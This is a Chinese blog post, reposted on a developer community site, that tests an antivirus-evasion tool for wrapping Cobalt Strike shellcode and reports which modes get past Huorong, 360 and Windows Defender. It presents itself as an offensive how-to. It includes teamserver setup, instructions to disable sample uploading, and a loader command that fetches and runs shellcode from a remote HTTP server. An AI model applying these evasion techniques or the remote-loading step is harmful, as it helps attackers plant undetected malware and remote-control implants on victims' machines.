前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
工具
TVP
发布
社区首页 >专栏 >【新版】掩日免杀windows Defender「建议收藏」

【新版】掩日免杀windows Defender「建议收藏」

作者头像
全栈程序员站长
发布2022-09-24 12:30:40
2.1K0
发布2022-09-24 12:30:40
举报

大家好,又见面了,我是你们的朋友全栈君。

更新时间:2022.05.16

image.png
image.png

本文首发乌鸦安全知识星球

1. 介绍

掩日免杀是一个非常优秀的项目,目前在4月19号已经更新,更新的变动较大,支持的种类更多,在这里再试试现在的效果如何: https://github.com/1y0n/av_evasion_tool/

image.png
image.png

下载之后本地打开:(记得关闭杀软)

image.png
image.png

2. 环境配置

安装环境:Windows10虚拟机 在这里新版本掩日采用了gcc环境和go环境,在作者的项目介绍中,对其都有要求,我们按照要求分别安装gccgo的环境:

gcc安装

gcc --version

image.png
image.png

go安装

go version

image.png
image.png

3. 环境

在作者的介绍中,针对Cobalt Strike生成的木马要求: 针对Cobalt Strike,不要选择生成Windows分阶段木马、Windows无阶段木马,而是生成payload,最终是一个payload.c文件。 因此在这里我们使用最常用的CS的木马来进行操作。

3.1 环境准备

在本地启动一个CS,服务端: sudo ./teamserver 10.30.1.147 123

启用客户端,并新增监听,在这里使用作者建议的HTTPS方式:

image.png
image.png

然后生成一个payload.c文件:

image.png
image.png

3.2 测试环境

测试机:

  • Windows10 360主动防御
  • Windows7 火绒主动防御
  • Windows10 开启windows Defender

其中测试的杀软均升级到最新,并且关闭了自动上传样本的功能。

4. 免杀测试

4.1 通用免杀

在这里选择直接执行的方式,并且使用隐藏窗口的模式:

image.png
image.png

此时生成成功:

image.png
image.png

4.1.1 火绒(成功)

image.png
image.png

此时没有发现问题,上线测试:

image.png
image.png

4.1.2 360(成功)

关闭360的自动上传样本功能:

image.png
image.png

然后按位置扫描,没有发现问题:

image.png
image.png

上线测试下,此时上线正常:

image.png
image.png

4.1.3 Windows Defender(失败)

此时的 Windows Defender病毒库为最新版本:

image.png
image.png
静态测试
image.png
image.png
动态上线(被杀)

在上线之后,立刻被拦截查杀:

image.png
image.png

在这里可以发现,三个杀软中只有Windows Defender难过,因此针对它进一步进行测试: 在这里选择了加密方法,然后再去生成木马,但是发现过Windows Defender的时候,依旧被杀。

image.png
image.png

4.1.4 强力模式(成功)

在这里选择强力模式,作者对于强力模式的解释是拥有很好的免杀和反沙盒效果,但是耗时比较长,而且会消耗大量的CPU

image.png
image.png
image.png
image.png

此时静态查杀,依旧正常

image.png
image.png

动态上线正常:

image.png
image.png

4.2 分离免杀

在这里执行的时候,会生成两个文件,一个是不含shellcodeshellcode加载器,另外就是一个shellcode文件(可能经过了各种加密变形)。

image.png
image.png

此时生成了两个文件:

image.png
image.png

静态查杀正常:

image.png
image.png

动态加载: 动态加载的话,不是直接双击上线的,而是在命令行中,将exe加载,并且跟上分离文件的名称才可以:(此时没有杀软)

image.png
image.png

当有Windows Defender的时候:

image.png
image.png

直接被动态查杀,再试试其他的方式,发现全部被杀

image.png
image.png

4.3 网络分离

image.png
image.png

将生成的shellcode加载器放到目标机器上,并在目标机能访问到的机器上开启一个http服务: python3 -m http.server 802

image.png
image.png

然后在远程进行加载: dUu.exe http://10.30.1.147:802/dUu.txt

image.png
image.png

还是被Windows Defender杀了:

image.png
image.png

5. 总结

在整个掩日免杀项目中,可以看到功能比以前增加了很多,而且体验感变好,免杀能力也很强。 当然Windows Defender依旧是很难对抗的,很多情况下还是要看对方的环境是啥,不要一味地追求Bypass everyone

发布者:全栈程序员栈长,转载请注明出处:https://javaforall.cn/171478.html原文链接:https://javaforall.cn

本文参与 腾讯云自媒体分享计划,分享自作者个人站点/博客。
如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 作者个人站点/博客 前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体分享计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
目录
  • 本文首发乌鸦安全知识星球
  • 1. 介绍
  • 2. 环境配置
    • gcc安装
      • go安装
      • 3. 环境
        • 3.1 环境准备
          • 3.2 测试环境
          • 4. 免杀测试
            • 4.1 通用免杀
              • 4.1.1 火绒(成功)
              • 4.1.2 360(成功)
              • 4.1.3 Windows Defender(失败)
              • 4.1.4 强力模式(成功)
            • 4.2 分离免杀
              • 4.3 网络分离
              • 5. 总结
              领券
              问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档